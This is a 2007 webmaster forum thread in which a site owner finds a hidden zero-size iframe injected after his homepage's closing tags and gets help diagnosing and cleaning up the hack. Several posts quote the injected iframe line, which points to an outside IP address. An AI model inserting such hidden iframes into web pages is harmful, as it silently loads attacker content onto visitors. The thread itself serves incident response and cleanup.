Strange code appears when validating

[Duz]

Webado, Another problem!!

This morning, I went back and validated a my opening page <
www.toiletology.com/index.shtml > and got an error. When I look at
the source code error it appears to be something that is not in my
page at all. It is below the closing body and html codes. A search
on Google for 116.0.103.105 returns a foreign page. The translated
page appears to be a blog but is garbled but you can make out that
they are talking about "infected" pages. I looked at a few other
pages, but it seems it is only on the index.shtml page.

What to do?

DUZ
www.toiletology.com
www.fixitips.com

=================================================================

</body>
</html>
<iframe src='http://116.0.103.105/reflinks/' width='0' height='0'></
iframe>

=================================================================

Куда течет траффик, смотрит вЪебмастир - Форум разведчиков ...
- [ Translate this page ]
... "_ttp://116.0.103.105/reflinks/". Фрейм скрытый, так как его
ширина и высота равну нулю (width='0' height='0') (IMG:style_emoticons/
default/smile13.gif) ...
it2b-forum.ru/index.php?showtopic=4084&view=getlastpost - 99k - Cached
- Similar pages - Note this

[Christina S]

Ok, somebody inserted this crap:

<iframe src='http://116.0.103.105/reflinks/' width='0' height='0'></iframe>

You've been hacked it seems.

This also triggers alarms from IE - of malicious code or something.

Use an FTP program and check to see what might be. Check source codes of
your index page.

Check the .htaccess file. Check in all folders, including those for
Frontpage extensions (even if you don't use FP).

It's I'm afraid a hack throgh Frontpage extensions - those are known to be
vulnerable.

Call your hoster. Most probably it is at the serevr level.

It's serious.

Christina
www.webado.net

[Christina S]

It seems just index.shmtl has been hacked.

http://web-sniffer.net/?url=http%3A%2F%2Fwww.toiletology.com%2Findex.shtml&submit=Submit&http=1.1&gzip=yes&type=GET&uak=0

Look at the bottom.

Whereas if you test another page like intro.shtml you won't find that.

Check the version you have on your pc. If it's clean, with nothing after the
</html> tag, uplaod it to replace the one on the server.
Upload only that file, not the whole site.

If you are using Frontpage, here's bad news: stop.

Change you passwords.

Check server logs.

Call your hoster.

Christina
www.webado.net

----- Original Message -----
From: "Duz" <kay.k...@ayrlawn.com>
To: "Only Validation + Navigation = Crawlability"
<only-va...@googlegroups.com>
Sent: Tuesday, December 04, 2007 11:19 AM
Subject: Only Validation Strange code appears when validating

[Christina S]

http://whois.domaintools.com/116.0.103.105

Malaysia.
A home server it seems.

Sneaky.

Maybe send an email to abouse [@] globaltransit.net - explain the user using
this ip is involved in a site hacking.

Currently all that that iframe holds is these characters, no html code:

^_~Supposed to say, hey, look at me I hacked you. Yeah, right, real
community conscious.

Christina
www.webado.net

----- Original Message -----
From: "Duz" <kay.k...@ayrlawn.com>
To: "Only Validation + Navigation = Crawlability"
<only-va...@googlegroups.com>
Sent: Tuesday, December 04, 2007 11:19 AM
Subject: Only Validation Strange code appears when validating

[webado]

Sorry, that email is for abuse [@] globaltransit.net .

> > - Similar pages - Note this- Hide quoted text -
>
> - Show quoted text -

[Duz]

Thanks again Webado,
I uploaded the files off my computer and that cleaned up the files on
the server. Another reason to validate pages; had I not validated I
would never have found this hack. I think it happened only a few days
ago. I haven't found any other pages involved. Is there any way to
protect a site from this problem?

Duz
www.toiletology.com
www.fixitips.com

[webado]

Well they had to have had access through something.

Either your user id & password are easy to guess (so you change the
password), or you have unsecured acces points .

Or the entire server is compromised - and you had better talk to your
hoster pronto.

They should either get rid of Frontpage extensions or at leat apply
the patches that tighten security. As server admins they should be
aware of this.

You should really check all the folders, all the files.

[Duz]

Hi Webado,

It took a few days, but my hosting service finally came back to me and
said that they had checked all the other domains on their servers and
couldn't find any others that had been corrupted. All four of our
domains had that line of code after the closing </body></html>
statements. When I was uploading the clean pages I noticed that the
files on the server were dated 30 Nov 2007 ( Friday a week ago). Two
of those domains, I haven't touched for months. I've changed the
passwords for all the domains. Not sure what else can be done, except
to keeping validating.

I'm getting a bit paranoid I think. Our Google revenue has dropped
off quite bit and I'm wondering if it could have anything to do with
that invasion.
Duz
www.toiletology.com
www.fixitips.com

[webado]

Well your main site's homepages has been re-cached freshly on December
6th (or at least the homepage has). Keep an eye on it.
The other site's homepage has not been re-cached yet, so the cache
still has that iframe in t's source code.

I doubt any drop in Google revenue would be due to this incident. More
likely a seasonal drop. Christmas is coming, people are less concerned
with this stuff probably.